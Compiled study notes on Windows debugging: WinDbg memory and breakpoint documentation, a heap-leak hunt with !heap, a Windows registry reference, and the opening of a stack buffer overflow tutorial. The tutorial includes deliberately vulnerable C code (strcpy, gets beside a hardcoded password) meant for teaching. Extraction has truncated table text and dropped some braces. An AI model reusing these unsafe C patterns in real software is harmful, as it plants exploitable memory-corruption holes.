words, double words, and quad-words; short, long, and quad integers and unsigned
integers; 10-byte, 16-byte, 32-byte, and 64-byte real numbers; ASCII characters;
Unicode characters; and hexadecimal bytes. The display of hexadecimal bytes includes
ASCII characters as well.

The Memory window has a toolbar that contains two buttons, a menu, and a box and has a
shortcut menu with additional commands. To access the menu, select and hold (or right-click)
the title bar or select the icon near the upper-right corner of the window ( ). The toolbar
and shortcut menu contain the following choices:

• (Toolbar only) The address box enables you to specify a new address or offset. The
exact meaning of this box depends on the memory type you are viewing. For example,
if you are viewing virtual memory, the box enables you to specify a new virtual address
or offset.

• (Toolbar only) Display format enables you to select a new display format.

• (Toolbar and menu) Previous (on the toolbar) and Previous page (on the shortcut
menu) cause the previous section of memory to be displayed.

• (Toolbar and menu) Next (on the toolbar) and Next page (on the shortcut menu) cause
the next section of memory to be displayed.

• (Menu only) Toolbar turns the toolbar on and off.

• (Menu only) Auto-fit columns ensures that the number of columns displayed in the
Memory window fits the width of the Memory window.

• (Menu only) Dock or Undock causes the window to enter or leave the docked state.

• (Menu only) Move to new dock closes the Memory window and opens it in a new
dock.

• (Menu only) Set as tab-dock target for window type sets the selected Memory
window as the tab-dock target for other Memory windows. All Memory windows that
are opened after one is chosen as the tab-dock target are automatically grouped with
that window in a tabbed collection.

• (Menu only) Always floating causes the window to remain undocked even if it is
dragged to a docking location.

• (Menu only) Properties opens the Memory Options dialog box, which is described in
the following section within this topic.

• (Menu only) Help opens this topic in the Debugging Tools for Windows
documentation.

• (Menu only) Close closes this window.

Memory Options Dialog Box

When you select Properties on the shortcut menu, the Memory Options dialog box appears.

In kernel mode, there are six memory types available as tabs in this dialog box: Virtual
Memory, Physical Memory, Bus Data, Control Data, I/O (I/O port information),
and MSR (model-specific register information). Select the tab that corresponds to the
information that you want to access.

In user mode, only the Virtual Memory tab is available.

Each tab enables you to specify the memory that you want to display:

• In the Virtual Memory tab, in the Offset box, specify the address or offset of the
beginning of the memory range that you want to view.

• In the Physical Memory tab, in the Offset box, specify the physical address of the
beginning of the memory range that you want to view. The Memory window can
display only described, cacheable physical memory. If you want to display physical
memory that has other attributes, use the d* (Display Memory) command or
the !d\* extension.

• In the Bus Data tab, in the Bus Data Type menu, specify the bus data type. Then, use
the Bus number, Slot number, and Offset boxes to specify the bus data that you want
to view.

• In the Control Data tab, use the Processor and Offset text boxes to specify the control
data that you want to view.
• In the I/O tab, in the Interface Type menu, specify the I/O interface type. Use the Bus
number, Address space, and Offset boxes to specify the data that you want to view.

• In the MSR tab, in the MSR box, specify the model-specific register that you want to
view.

Each tab also includes a Display format menu. This menu has the same effect as the Display
format menu in the Memory window.

Select OK in the Memory Options dialog box to cause your changes to take effect.

https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/memory-window

Command

Use the command menu to:

• Prefer DML

• Highlight and Un-highlight the current text selection (CTRL+ALT+H)

• Clear the command window text

• Save window text to a dml file

Memory

Use the memory menu to:

• Set a data model memory query

• Set the memory size, for example to byte or long

• Set the display format, for example hex or signed

• Set the text display format, for example to ASCII

Source

Use the source menu to:

• Open a source file

• Set an instruction pointer

• Run to cursor

• Close all source windows

https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/windbg-notes-etc-
preview

Introduction

Memory leak is a time consuming bug often created by C++ developers. Detection of memory
leaks is often tedious. Things get worst if the code is not written by you, or if the code base is
quite huge.

Though there are tools available in the market that will help you in memory leak detection,
most of these tools are not free. I found Windbg as a freeware powerful tool to solve memory
leak bugs. At least, we get an idea about the code location which might be suspected to cause
memory leaks. COM Interface leaks are out of the scope of this article.

Windbg is a powerful user/kernel space debugger from Microsoft, which can be downloaded
and installed from here.

Using Windbg

To start working with Windbg:

1. Configure the symbol file path to the Microsoft symbol server

“SRV*d:\symbols*http://msdl.microsoft.com/download/symbols”.

2. Add your program EXE/DLL PDB (program database) path to the symbol file path.

3. You also need to to configure the Operating System's flag to enable user stack trace for
the process which has memory leaks. This is simple, and can be done
with gflags.exe. Gflags.exe is installed during Windbg's installation. This can also be
done through command line, using the command “gflags.exe /i MemoryLeak.exe
+ust”. My program name is Test2.exe; hence, for the demo, I will be
using Test2.exe rather than MemoryLeak.exe. The snapshot below shows the setting of
OS flags for the application Test2.exe.

Once we have configured Windbg for the symbol file path, start the process which is leaking
memory, and attach Windbg to it. The Attach option in Windbg is available under the File
menu, or can be launched using the F6 shortcut. The snapshot below shows the same:
The !heap command of Windbg is used to display heaps. !heap is well documented in the
Windbg help.

I have developed a small program which leaks memory, and will demonstrate further using the
same.

C++

Copy Code

int _tmain(int argc, _TCHAR* argv[])

{ while(1)

AllocateMemory();

return 0;

void AllocateMemory()
{

int* a = new int[2000];

ZeroMemory(a, 8000);

Sleep(1);

The above program leaks an integer array of size 2000*4 bytes.

After attaching Windbg to the process, execute the !heap –s command. -s stands for summary.
Below is the output of the !heap -s for the leaking process:

Copy Code

0:001> !heap -s

NtGlobalFlag enables following debugging aids for new heaps:

validate parameters

stack back traces

Heap Flags Reserv Commit Virt Free List UCR Virt Lock Fast

(k) (k) (k) (k) length blocks cont. heap

-----------------------------------------------------------------------------

00150000 58000062 1024 12 12 1 1 1 0 0 L

00250000 58001062 64 24 24 15 1 1 0 0 L

00260000 58008060 64 12 12 10 1 1 0 0

00330000 58001062 64576 47404 47404 13 4 1 0 0

-----------------------------------------------------------------------------

Let the process execute for some time, and then re-break in to the process, and execute !heap
-s again. Shown below is the output of the command:

Copy Code

0:001> !heap -s

NtGlobalFlag enables following debugging aids for new heaps:

validate parameters

stack back traces

Heap Flags Reserv Commit Virt Free List UCR Virt Lock Fast

(k) (k) (k) (k) length blocks cont. heap

-----------------------------------------------------------------------------

00150000 58000062 1024 12 12 1 1 1 0 0 L

00250000 58001062 64 24 24 15 1 1 0 0 L

00260000 58008060 64 12 12 10 1 1 0 0

00330000 58001062 261184 239484 239484 14 4 1 0 0

-----------------------------------------------------------------------------

Lines marked in bold show the growing heap. The above snapshot shows a heap with the
handle 00330000 growing.

Execute “!heap -stat –h 00330000” for the growing heap. This command shows the heap
statistics for the growing heap. Shown below is the command's output.

Copy Code

0:001> !heap -stat -h 00330000

heap @ 00330000

group-by: TOTSIZE max-display: 20

size #blocks total ( %) (percent of total busy bytes)

1f64 76c6 - e905f58 (99.99)

1800 1 - 1800 (0.00)

824 2 - 1048 (0.00)

238 2 - 470 (0.00)

244 1 - 244 (0.00)

4c 5 - 17c (0.00)

b0 2 - 160 (0.00)

86 2 - 10c (0.00)

50 3 - f0 (0.00)

74 2 - e8 (0.00)

38 4 - e0 (0.00)

48 3 - d8 (0.00)

c4 1 - c4 (0.00)

62 2 - c4 (0.00)

be 1 - be (0.00)

b8 1 - b8 (0.00)

ae 1 - ae (0.00)

ac 1 - ac (0.00)

55 2 - aa (0.00)
a4 1 - a4 (0.00)

The above snapshot shows 0x76c6 blocks of size 1f64 being allocated (marked in bold). Such a
huge number of blocks of the same size makes us suspect that these can be leaked blocks. Rest
of the block allocations do not have growing block numbers.

The next step is to get the address of these blocks. Use the command !heap -flt s 1f64. This
command filters all other blocks of heap and displays the details of blocks having size 1f64.

Shown below is the output for the command:

Shrink ▲ Copy Code

0:001> !heap -flt s 1f64

_HEAP @ 150000

_HEAP @ 250000

_HEAP @ 260000

_HEAP @ 330000

HEAP_ENTRY Size Prev Flags UserPtr UserSize - state

003360e0 03f0 0000 [07] 003360e8 01f64 - (busy)

00338060 03f0 03f0 [07] 00338068 01f64 - (busy)

00339fe0 03f0 03f0 [07] 00339fe8 01f64 - (busy)

0033bf60 03f0 03f0 [07] 0033bf68 01f64 - (busy)

0033dee0 03f0 03f0 [07] 0033dee8 01f64 - (busy)

01420040 03f0 03f0 [07] 01420048 01f64 - (busy)

01421fc0 03f0 03f0 [07] 01421fc8 01f64 - (busy)

01423f40 03f0 03f0 [07] 01423f48 01f64 - (busy)

01425ec0 03f0 03f0 [07] 01425ec8 01f64 - (busy)

01427e40 03f0 03f0 [07] 01427e48 01f64 - (busy)

01429dc0 03f0 03f0 [07] 01429dc8 01f64 - (busy)

0142bd40 03f0 03f0 [07] 0142bd48 01f64 - (busy)

0142dcc0 03f0 03f0 [07] 0142dcc8 01f64 - (busy)

0142fc40 03f0 03f0 [07] 0142fc48 01f64 - (busy)

01431bc0 03f0 03f0 [07] 01431bc8 01f64 - (busy)

01433b40 03f0 03f0 [07] 01433b48 01f64 - (busy)

01435ac0 03f0 03f0 [07] 01435ac8 01f64 - (busy)

01437a40 03f0 03f0 [07] 01437a48 01f64 - (busy)

014399c0 03f0 03f0 [07] 014399c8 01f64 - (busy)

0143b940 03f0 03f0 [07] 0143b948 01f64 - (busy)

0143d8c0 03f0 03f0 [07] 0143d8c8 01f64 - (busy)

0143f840 03f0 03f0 [07] 0143f848 01f64 - (busy)

014417c0 03f0 03f0 [07] 014417c8 01f64 - (busy)

01443740 03f0 03f0 [07] 01443748 01f64 - (busy)

014456c0 03f0 03f0 [07] 014456c8 01f64 - (busy)

01447640 03f0 03f0 [07] 01447648 01f64 - (busy)

014495c0 03f0 03f0 [07] 014495c8 01f64 - (busy)

0144b540 03f0 03f0 [07] 0144b548 01f64 - (busy)

0144d4c0 03f0 03f0 [07] 0144d4c8 01f64 - (busy)

0144f440 03f0 03f0 [07] 0144f448 01f64 - (busy)

014513c0 03f0 03f0 [07] 014513c8 01f64 - (busy)

01453340 03f0 03f0 [07] 01453348 01f64 - (busy)

014552c0 03f0 03f0 [07] 014552c8 01f64 - (busy)

01457240 03f0 03f0 [07] 01457248 01f64 - (busy)

014591c0 03f0 03f0 [07] 014591c8 01f64 - (busy)

0145b140 03f0 03f0 [07] 0145b148 01f64 - (busy)

0145d0c0 03f0 03f0 [07] 0145d0c8 01f64 - (busy)

0145f040 03f0 03f0 [07] 0145f048 01f64 - (busy)

01460fc0 03f0 03f0 [07] 01460fc8 01f64 - (busy)

01462f40 03f0 03f0 [07] 01462f48 01f64 - (busy)

01464ec0 03f0 03f0 [07] 01464ec8 01f64 - (busy)

01466e40 03f0 03f0 [07] 01466e48 01f64 - (busy)

01468dc0 03f0 03f0 [07] 01468dc8 01f64 - (busy)

Use any UsrPtr column value from the listed output, and then use the the command !heap -p -
a UsrPtr to display the call stack for UsrPtr. I have selected 0143d8c8 marked in bold.

Upon execution of !heap -p -a 0143d8c8, we get the call stack shown below:

Copy Code

0:001> !heap -p -a 0143d8c8

address 0143d8c8 found in

_HEAP @ 330000

HEAP_ENTRY Size Prev Flags UserPtr UserSize - state

0143d8c0 03f0 0000 [07] 0143d8c8 01f64 - (busy)

Trace: 0025

7c96d6dc ntdll!RtlDebugAllocateHeap+0x000000e1

7c949d18 ntdll!RtlAllocateHeapSlowly+0x00000044

7c91b298 ntdll!RtlAllocateHeap+0x00000e64

102c103e MSVCR90D!_heap_alloc_base+0x0000005e

102cfd76 MSVCR90D!_heap_alloc_dbg_impl+0x000001f6

102cfb2f MSVCR90D!_nh_malloc_dbg_impl+0x0000001f

102cfadc MSVCR90D!_nh_malloc_dbg+0x0000002c

102db25b MSVCR90D!malloc+0x0000001b

102bd691 MSVCR90D!operator new+0x00000011

102bd71f MSVCR90D!operator new[]+0x0000000f

4113d8 Test2!AllocateMemory+0x00000028

41145c Test2!wmain+0x0000002c

411a08 Test2!__tmainCRTStartup+0x000001a8

41184f Test2!wmainCRTStartup+0x0000000f

7c816fd7 kernel32!BaseProcessStart+0x00000023

The lines marked in bold shows the functions from our code.

Note: Sometimes, it might happen that the “!heap -s” command does not show a growing
heap. In that case, use the “!heap -stat -h” command to list all the heaps with their sizes and
number of blocks. Spot the growing number of blocks, and then use the “!heap –flt s SIZE”
(SIZE = the size of the suspected block) command.

https://www.codeproject.com/Articles/31382/Memory-Leak-Detection-Using-Windbg

Windows Register
Description of the registry

The Microsoft Computer Dictionary, Fifth Edition, defines the registry as:

A central hierarchical database used in Windows 98, Windows CE, Windows NT, and Windows
2000 used to store information that is necessary to configure the system for one or more
users, applications, and hardware devices.

The Registry contains information that Windows continually references during operation, such
as profiles for each user, the applications installed on the computer and the types of
documents that each can create, property sheet settings for folders and application icons,
what hardware exists on the system, and the ports that are being used.

The Registry replaces most of the text-based .ini files that are used in Windows 3.x and MS-
DOS configuration files, such as the Autoexec.bat and Config.sys. Although the Registry is
common to several Windows operating systems, there are some differences among them. A
registry hive is a group of keys, subkeys, and values in the registry that has a set of supporting
files that contain backups of its data. The supporting files for all hives except
HKEY_CURRENT_USER are in the %SystemRoot%\System32\Config folder on Windows NT 4.0,
Windows 2000, Windows XP, Windows Server 2003, and Windows Vista. The supporting files
for HKEY_CURRENT_USER are in the %SystemRoot%\Profiles\Username folder. The file name
extensions of the files in these folders indicate the type of data that they contain. Also, the lack
of an extension may sometimes indicate the type of data that they contain.

Registry hive Supporting files

HKEY_LOCAL_MACHINE\SAM Sam, Sam.log, Sam.sav

HKEY_LOCAL_MACHINE\Security Security, Security.log, Security.sav

HKEY_LOCAL_MACHINE\Software Software, Software.log, Software.sav

HKEY_LOCAL_MACHINE\System System, System.alt, System.log, System.sav

HKEY_CURRENT_CONFIG System, System.alt, System.log, System.sav, Ntuser.dat, Ntuser.dat.log

HKEY_USERS\DEFAULT Default, Default.log, Default.sav

In Windows 98, the registry files are named User.dat and System.dat. In Windows Millennium
Edition, the registry files are named Classes.dat, User.dat, and System.dat.

Note

Security features in Windows let an administrator control access to registry keys.

The following table lists the predefined keys that are used by the system. The maximum size of
a key name is 255 characters.

Folder/predefined key Description

HKEY_CURRENT_USER Contains the root of the configuration information for the user who is currently logged on
user's folders, screen colors, and Control Panel settings are stored here. This information
associated with the user's profile. This key is sometimes abbreviated as HKCU.

HKEY_USERS Contains all the actively loaded user profiles on the computer. HKEY_CURRENT_USER is a
subkey of HKEY_USERS. HKEY_USERS is sometimes abbreviated as HKU.

HKEY_LOCAL_MACHINE Contains configuration information particular to the computer (for any user). This key is
sometimes abbreviated as HKLM.

HKEY_CLASSES_ROOT Is a subkey of HKEY_LOCAL_MACHINE\Software. The information that is stored here mak

sure that the correct program opens when you open a file by using Windows Explorer. Th
is sometimes abbreviated as HKCR. Starting with Windows 2000, this information is store
under both the HKEY_LOCAL_MACHINE and HKEY_CURRENT_USER keys.
Folder/predefined key Description

The HKEY_LOCAL_MACHINE\Software\Classes key contains default settings that can appl

all users on the local computer. The HKEY_CURRENT_USER\Software\Classes key contain
settings that override the default settings and apply only to the interactive user. The
HKEY_CLASSES_ROOT key provides a view of the registry that merges the information fro
these two sources. HKEY_CLASSES_ROOT also provides this merged view for programs th
designed for earlier versions of Windows. To change the settings for the interactive user,
changes must be made under HKEY_CURRENT_USER\Software\Classes instead of under
HKEY_CLASSES_ROOT. To change the default settings, changes must be made
under HKEY_LOCAL_MACHINE\Software\Classes. If you write keys to a key under
HKEY_CLASSES_ROOT, the system stores the information
under HKEY_LOCAL_MACHINE\Software\Classes. If you write values to a key under
HKEY_CLASSES_ROOT, and the key already exists
under HKEY_CURRENT_USER\Software\Classes, the system will store the information the
instead of under HKEY_LOCAL_MACHINE\Software\Classes.

HKEY_CURRENT_CONFIG Contains information about the hardware profile that is used by the local computer at sys
startup.

Note

The registry in 64-bit versions of Windows XP, Windows Server 2003, and Windows Vista is
divided into 32-bit and 64-bit keys. Many of the 32-bit keys have the same names as their 64-
bit counterparts, and vice versa. The default 64-bit version of Registry Editor that is included
with 64-bit versions of Windows XP, Windows Server 2003, and Windows Vista displays the 32-
bit keys under the node HKEY_LOCAL_MACHINE\Software\WOW6432Node. For more
information about how to view the registry on 64-Bit versions of Windows, see How to view
the system registry by using 64-bit versions of Windows.

The following table lists the data types that are currently defined and that are used by
Windows. The maximum size of a value name is as follows:

• Windows Server 2003, Windows XP, and Windows Vista: 16,383 characters

• Windows 2000: 260 ANSI characters or 16,383 Unicode characters

• Windows Millennium Edition/Windows 98/Windows 95: 255 characters

Long values (more than 2,048 bytes) must be stored as files with the file names stored in the
registry. This helps the registry perform efficiently. The maximum size of a value is as follows:

• Windows NT 4.0/Windows 2000/Windows XP/Windows Server 2003/Windows Vista:

Available memory

• Windows Millennium Edition/Windows 98/Windows 95: 16,300 bytes

Note

There is a 64K limit for the total size of all values of a key.
Name Data type Description

Binary Value REG_BINARY Raw binary data. Most hardware component information is st
as binary data and is displayed in Registry Editor in hexadecim
format.

DWORD REG_DWORD Data represented by a number that is 4 bytes long (a 32-bit

Value integer). Many parameters for device drivers and services are
type and are displayed in Registry Editor in binary, hexadecim
decimal format. Related values are DWORD_LITTLE_ENDIAN (l
significant byte is at the lowest address) and
REG_DWORD_BIG_ENDIAN (least significant byte is at the high
address).

Expandable REG_EXPAND_SZ A variable-length data string. This data type includes variables
String Value are resolved when a program or service uses the data.

Multi-String REG_MULTI_SZ A multiple string. Values that contain lists or multiple values in
Value form that people can read are generally this type. Entries are
separated by spaces, commas, or other marks.

String Value REG_SZ A fixed-length text string.

Binary Value REG_RESOURCE_LIST A series of nested arrays that is designed to store a resource li
that is used by a hardware device driver or one of the physical
devices it controls. This data is detected and written in the
\ResourceMap tree by the system and is displayed in Registry
Editor in hexadecimal format as a Binary Value.

Binary Value REG_RESOURCE_REQUIREMENTS_LIST A series of nested arrays that is designed to store a device driv
list of possible hardware resources the driver or one of the ph
devices it controls can use. The system writes a subset of this
the \ResourceMap tree. This data is detected by the system an
displayed in Registry Editor in hexadecimal format as a Binary
Value.

Binary Value REG_FULL_RESOURCE_DESCRIPTOR A series of nested arrays that is designed to store a resource li
that is used by a physical hardware device. This data is detecte
and written in the \HardwareDescription tree by the system a
displayed in Registry Editor in hexadecimal format as a Binary
Value.

None REG_NONE Data without any particular type. This data is written to the re
by the system or applications and is displayed in Registry Edito
hexadecimal format as a Binary Value

Link REG_LINK A Unicode string naming a symbolic link.

QWORD REG_QWORD Data represented by a number that is a 64-bit integer. This da

Value displayed in Registry Editor as a Binary Value and was introduc
Windows 2000.
Back up the registry

Before you edit the registry, export the keys in the registry that you plan to edit, or back up the
whole registry. If a problem occurs, you can then follow the steps in the Restore the
registry section to restore the registry to its previous state. To back up the whole registry, use
the Backup utility to back up the system state. The system state includes the registry, the
COM+ Class Registration Database, and your boot files. For more information about how to
use the Backup utility to back up the system state, see the following articles:

• Back up and restore your PC

• How to use the backup feature to back up and restore data in Windows Server 2003

Edit the registry

To modify registry data, a program must use the registry functions that are defined in Registry
Functions.

Administrators can modify the registry by using Registry Editor (Regedit.exe or Regedt32.exe),
Group Policy, System Policy, Registry (.reg) files, or by running scripts such as VisualBasic script
files.

Use the Windows user interface

We recommend that you use the Windows user interface to change your system settings
instead of manually editing the registry. However, editing the registry may sometimes be the
best method to resolve a product issue. If the issue is documented in the Microsoft Knowledge
Base, an article with step-by-step instructions to edit the registry for that issue will be
available. We recommend that you follow those instructions exactly.

Use Registry Editor

Warning

Serious problems might occur if you modify the registry incorrectly by using Registry Editor or
by using another method. These problems might require that you reinstall the operating
system. Microsoft cannot guarantee that these problems can be solved. Modify the registry at
your own risk.

You can use Registry Editor to do the following actions:

• Locate a subtree, key, subkey, or value

• Add a subkey or a value

• Change a value

• Delete a subkey or a value

• Rename a subkey or a value

The navigation area of Registry Editor displays folders. Each folder represents a predefined key
on the local computer. When you access the registry of a remote computer, only two
predefined keys appear: HKEY_USERS and HKEY_LOCAL_MACHINE.

Use Group Policy

Microsoft Management Console (MMC) hosts administrative tools that you can use to
administer networks, computers, services, and other system components. The Group Policy
MMC snap-in lets administrators define policy settings that are applied to computers or users.
You can implement Group Policy on local computers by using the local Group Policy MMC
snap-in, Gpedit.msc. You can implement Group Policy in Active Directory by using the Active
Directory Users and Computers MMC snap-in. For more information about how to use Group
Policy, see the Help topics in the appropriate Group Policy MMC snap-in.

Use a Registration Entries (.reg) file

Create a Registration Entries (.reg) file that contains the registry changes, and then run the .reg
file on the computer where you want to make the changes. You can run the .reg file manually
or by using a logon script. For more information, see How to add, modify, or delete registry
subkeys and values by using a Registration Entries (.reg) file.

Use Windows Script Host

The Windows Script Host lets you run VBScript and JScript scripts directly in the operating
system. You can create VBScript and JScript files that use Windows Script Host methods to
delete, to read, and to write registry keys and values. For more information about these
methods, visit the following Microsoft Web sites:

• RegDelete method

• RegRead method

• RegWrite method

Use Windows Management Instrumentation

Windows Management Instrumentation (WMI) is a component of the Microsoft Windows

operating system and is the Microsoft implementation of Web-Based Enterprise Management
(WBEM). WBEM is an industry initiative to develop a standard technology for accessing
management information in an enterprise environment. You can use WMI to automate
administrative tasks (such as editing the registry) in an enterprise environment. You can use
WMI in scripting languages that have an engine on Windows and that handle Microsoft
ActiveX objects. You can also use the WMI Command-Line utility (Wmic.exe) to modify the
Windows registry.

For more information about WMI, see Windows Management Instrumentation.

For more information about the WMI Command-Line utility, see A description of the Windows
Management Instrumentation (WMI) command-line utility (Wmic.exe).

Use Console Registry Tool for Windows

You can use the Console Registry Tool for Windows (Reg.exe) to edit the registry. For help with
the Reg.exe tool, type reg /? at the Command Prompt, and then click OK.

Restore the registry

To restore the registry, use the appropriate method.

Method 1: Restore the registry keys

To restore registry subkeys that you exported, double-click the Registration Entries (.reg) file
that you saved in the Export registry subkeys section. Or, you can restore the whole registry
from a backup. For more information about how to restore the whole registry, see the Method
2: Restore the whole registry section later in this article.

Method 2: Restore the whole registry

To restore the whole registry, restore the system state from a backup. For more information
about how to restore the system state from a backup, see How to use Backup to protect data
and restore files and folders on your computer in Windows XP and Windows Vista.

Note

Backing up the system state also creates updated copies of the registry files in
the %SystemRoot%\Repair folder.

https://docs.microsoft.com/en-us/troubleshoot/windows-server/performance/windows-
registry-advanced-users

Controlling Execution with Windbg

WinDbg can set breakpoints31 to halt the execution flow at desired locations in the code.
There are two different types of breakpoints; software and processor/hardware breakpoints.
Breakpoints controlled directly by the debugger are known as software breakpoints.
Breakpoints controlled by the processor and set through the debugger are known as hardware
breakpoints. 32 In the following section, we will experiment with setting up various software
and hardware breakpoints while attached to the notepad.exe process. We will learn how to set
software breakpoints at particular Windows APIs, some of which are not yet loaded in the
memory space of our application. We will also use hardware breakpoints to determine exactly
when our data is accessed.

You can specify the location of a breakpoint by virtual address, module and routine offsets, or
source file and line number (when in source mode). If you put a breakpoint on a routine
without an offset, the breakpoint is activated when that routine is entered.

There are several additional kinds of breakpoints:

• A breakpoint can be associated with a certain thread.

• A breakpoint can enable a fixed number of passes through an address before it is

triggered.

• A breakpoint can automatically issue certain commands when it is triggered.

• A breakpoint can be set on non-executable memory and watch for that location to be
read or written to.

If you are debugging more than one process in user mode, the collection of breakpoints
depends on the current process. To view or change a process' breakpoints, you must select the
process as the current process. For more information about the current process,
see Controlling Processes and Threads.

Debugger Commands for Controlling and Displaying Breakpoints

To control or display breakpoints, you can use the following methods:

• Use the bl (Breakpoint List) command to list existing breakpoints and their current
status.

• Use the .bpcmds (Display Breakpoint Commands) command to list all breakpoints
along with the commands that were used to create them.

• Use the bp (Set Breakpoint) command to set a new breakpoint.

• Use the bu (Set Unresolved Breakpoint) command to set a new breakpoint.

Breakpoints that are set with bu are called unresolved breakpoints; they have different
characteristics than breakpoints that are set with bp. For complete details,
see Unresolved Breakpoints (bu Breakpoints).

• Use the bm (Set Symbol Breakpoint) command to set new breakpoints on symbols
that match a specified pattern. A breakpoint set with bm will be associated with an
address (like a bp breakpoint) if the /d switch is included; it will be unresolved (like
a bu breakpoint) if this switch is not included.

• Use the ba (Break on Access) command to set a processor breakpoint, also known as
a data breakpoint. These breakpoints can be triggered when the memory location is
written to, when it is read, when it is executed as code, or when kernel I/O occurs. For
complete details, see Processor Breakpoints (ba Breakpoints).

• Use the bc (Breakpoint Clear) command to permanently remove one or more

breakpoints.

• Use the bd (Breakpoint Disable) command to temporarily disable one or more

breakpoints.

• Use the be (Breakpoint Enable) command to re-enable one or more disabled

breakpoints.

• Use the br (Breakpoint Renumber) command to change the ID of an existing

breakpoint.

• Use the bs (Update Breakpoint Command) command to change the command

associated with an existing breakpoint.

• Use the bsc (Update Conditional Breakpoint) command to change the condition under
which an existing conditional breakpoint occurs.

In Visual Studio and WinDbg, there are several user interface elements that facilitate
controlling and displaying breakpoints. See Setting Breakpoints in Visual Studio and Setting
Breakpoints in WinDbg.

Each breakpoint has a decimal number called the breakpoint ID associated with it. This number
identifies the breakpoint in various commands.

Breakpoint Commands

You can include a command in a breakpoint that is automatically executed when the
breakpoint is hit. For example, the following command breaks at MyFunction+0x47, writes a
dump file, and then resumes execution.

dbgcmdCopy
0:000> bu MyFunction+0x47 ".dump c:\mydump.dmp; g"

Note If you are controlling the user-mode debugger from the kernel debugger, do not use g
(Go) in the breakpoint command string. The serial interface might be unable to keep up with
this command, and you will be unable to break back into CDB. For more information about this
situation, see Controlling the User-Mode Debugger from the Kernel Debugger.

Number of Breakpoints

In kernel mode, you can use a maximum of 32 software breakpoints. In user mode, you can
use any number of software breakpoints.

The number of processor breakpoints that are supported depends on the target processor
architecture.

Conditional Breakpoints

You can set a breakpoint that is triggered only under certain conditions. For more information
about these kinds of breakpoints, see Setting a Conditional Breakpoint.

https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/methods-of-
controlling-breakpoints

Stack Based Buffer Overflow

#include <stdio.h>

#include <string.h>

int main(int argc, char *argv[])

charbuffer[64];

if (argc < 2)

printf("Error - You must supply at least one argument\n");

return 1;

strcpy(buffer,argv[1]);

return 0;

Stack-based buffer overflow exploits are likely the shiniest and most common form of exploit
for remotely taking over the code execution of a process. These exploits were extremely
common 20 years ago, but since then, a huge amount of effort has gone into mitigating stack-
based overflow attacks by operating system developers, application developers, and hardware
manufacturers, with changes even being made to the standard libraries developers use. Below,
we will explore how stack-based overflows work and detail the mitigation strategies that are
put in place to try to prevent them.
Deep dive on stack-based buffer overflow attacks

Understanding stack-based overflow attacks involves at least a basic understanding of

computer memory. Memory in a computer is simply a storage place for data and
instructions—data for storing numbers, letters, images, and anything else, and instructions
that tell the computer what to do with the data. Both are stored in the same memory because
memory was prohibitively expensive in the early days of computing, and reserving it for one
type of storage or another was wasteful. Such an approach where data and instructions are
stored together is known as a Von Neumann architecture. It’s still in use in most computers to
this day, though as you will see, it is not without complications.

On the bright side, while security was not a driving factor in early computer and software
design, engineers realized that changing running instructions in memory was a bad idea, so
even as long ago as the ‘90s, standard hardware and operating systems were doing a good job
of preventing changes to instructional memory. Unfortunately, you don’t really need to change
instructions to change the behavior of a running program, and with a little knowledge,
writeable data memory provides several opportunities and methods for affecting instruction
execution.

Take this particularly contrived example:

#include <signal.h>

#include <stdio.h>

#include <string.h>

int main(){

char realPassword[20];

char givenPassword[20];

strncpy(realPassword, "ddddddddddddddd", 20);

gets(givenPassword);

if (0 == strncmp(givenPassword, realPassword, 20)){

printf("SUCCESS!\n");

}else{

printf("FAILURE!\n");

raise(SIGINT);

printf("givenPassword: %s\n", givenPassword);

printf("realPassword: %s\n", realPassword);

return 0;
}

If you don’t know the C programming language, that’s fine. The interesting thing about this
program is that it creates two buffers in memory called realPassword and givenPassword as
local variables. Each buffer has space for 20 characters. When we run the program, space for
these local variables is created in-memory and specifically stored on the stack with all other
local variables (and some other stuff). The stack is a very structured, sequential memory space,
so the relative distance between any two local variables in-memory is guaranteed to be
relatively small. After this program creates the variables, it populates the realPassword value
with a string, then prompts the user for a password and copies the provided password into
the givenPassword value. Once it has both passwords, it compares them. If they match, it
prints “SUCCESS!” If not, it prints “FAILURE!”

Here’s an example run:

msfuser@ubuntu:~$ ./example.elf

test

FAILURE!

givenPassword: test

realPassword: ddddddddddddddd

This is exactly as we’d expect. The password we entered does not match the expected
password. There is a catch here: The programmer (me) made several really bad mistakes,
which we will talk about later. Before we cover that, though, let’s open a debugger and peek
into memory to see what the stack looks like in memory while the program is executing:

msfuser@ubuntu:~$ gdb example.elf

(gdb) run

Starting program: /home/msfuser/example.elf

aaaaaaaaaaaaaaaa

FAILURE!

Program received signal SIGINT, Interrupt.

0x00007ffff7a42428 in __GI_raise (sig=2) at ../sysdeps/unix/sysv/linux/raise.c:54

54 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory.

(gdb)

At this point, the program has taken in the data and compared it, but I added an interrupt in
the code to stop it before exiting so we could “look” at the stack. Debuggers let us see what
the program is doing and what the memory looks like on a running basis. In this case, we are
using the GNU Debugger (GDB). The GDB command ‘info frame’ allows us to find the location
in memory of the local variables, which will be on the stack:

(gdb) info frame

Stack level 0, frame at 0x7fffffffdde0:

rip = 0x7ffff7a42428 in __GI_raise (../sysdeps/unix/sysv/linux/raise.c:54); saved rip =

0x400701

called by frame at 0x7fffffffde30

source language c.

Arglist at 0x7fffffffddd0, args: sig=2

Locals at 0x7fffffffddd0, Previous frame's sp is 0x7fffffffdde0

Saved registers:

rip at 0x7fffffffddd8

(gdb)

Now that we know where the local variables are, we can print that area of memory:

(gdb) x/200x 0x7fffffffddd0

0x7fffffffddd0: 0x00000000 0x00000000 0x00400701 0x00000000

0x7fffffffdde0: 0x61616161 0x61616161 0x61616161 0x61616161

0x7fffffffddf0: 0x00000000 0x00000000 0x00000000 0x00000000

0x7fffffffde00: 0x64646464 0x64646464 0x64646464 0x00646464

0x7fffffffde10: 0x00000000 0x00007fff 0x00000000 0x00000000

As mentioned, the stack is sequentially stored data. If you know ASCII, then you know the
letter ‘a’ is represented in memory by the value 0x61 and the letter ‘d’ is 0x64. You can see
above that they are right next to each other in memory. The realPassword buffer is right after
the givenPassword buffer.

Now, let’s talk about the mistakes that the programmer (me) made. First, developers should
never, ever, ever use the gets function because it does not check to make sure that the size of
the data it reads in matches the size of the memory location it uses to save the data. It just
blindly reads the text and dumps it into memory. There are many functions that do the exact
same thing—these are known as unbounded functions because developers cannot predict
